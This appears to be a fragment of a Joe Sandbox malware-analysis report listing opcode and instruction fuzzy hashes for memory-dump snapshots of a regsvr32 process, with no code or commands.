                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e1b483fa8b935d3c5f064bafe562cd4b6135029d402cdd5fb9469b4e2ecae402
                                                                              • Instruction ID: 16de424963512b2e946dd1930000d8886fb7d0c3424f299622f333a43fc8e4a7
                                                                              • Opcode Fuzzy Hash: e1b483fa8b935d3c5f064bafe562cd4b6135029d402cdd5fb9469b4e2ecae402
                                                                              • Instruction Fuzzy Hash: A0E02311A6C95556DB1C661DA875779B6C0EB8D710F441176F04DD31CBC84C584192F6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2ebe56ec6ecd7852c29365410322e113061adfc89f6ff683ef2c7f75851dd54c
                                                                              • Instruction ID: 6fda399606825b8e9d9fc4769837ace8ff44ccc2c6c12de32663370fa5f15b66
                                                                              • Opcode Fuzzy Hash: 2ebe56ec6ecd7852c29365410322e113061adfc89f6ff683ef2c7f75851dd54c
                                                                              • Instruction Fuzzy Hash: 9FF0A230A0991D8FE794E764D0A2ABCB761FF99304F500439D01DE62C6CE2DA841DB65
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a6edaeb0037fb02a217142639518eca9cdfa6c92d902fdbfaca3c566195e9b28
                                                                              • Instruction ID: 925cbfb3ecb9a7cffb1191ed448b4d172be39e221096ac532f04213a5e7ba090
                                                                              • Opcode Fuzzy Hash: a6edaeb0037fb02a217142639518eca9cdfa6c92d902fdbfaca3c566195e9b28
                                                                              • Instruction Fuzzy Hash: FBE0D811E0E7E90FE3A6637454BE1A5BFA0AF0611074E05FAC059CB1E7E81D9C85C363
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2c52105ba93c53c8696ee142bd2458b0d9a5a4d4df670811e4191d024073a47c
                                                                              • Instruction ID: 47c2cfebfeb4e4ab29aced33973c9bcf1218ea163463b7cc3760cf4ec2bc8ab2
                                                                              • Opcode Fuzzy Hash: 2c52105ba93c53c8696ee142bd2458b0d9a5a4d4df670811e4191d024073a47c
                                                                              • Instruction Fuzzy Hash: AAE0ED9145F7D50FE756832848A55547FA19F17214B4E01E7C0949B1E7D54D480AD326
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83511c726a643a8d1834f81f9488af27fe82f2b9dcff90d3a2ca6e4f2da241fa
                                                                              • Instruction ID: d6eea2237949c4af20bb3da8a51eba406169c38ccccf9c7b3eba535b6ab03c9e
                                                                              • Opcode Fuzzy Hash: 83511c726a643a8d1834f81f9488af27fe82f2b9dcff90d3a2ca6e4f2da241fa
                                                                              • Instruction Fuzzy Hash: 4BA01201A4A80D05999420686CD1058A0C0D784030BC003B1C408C1185DC4D44520150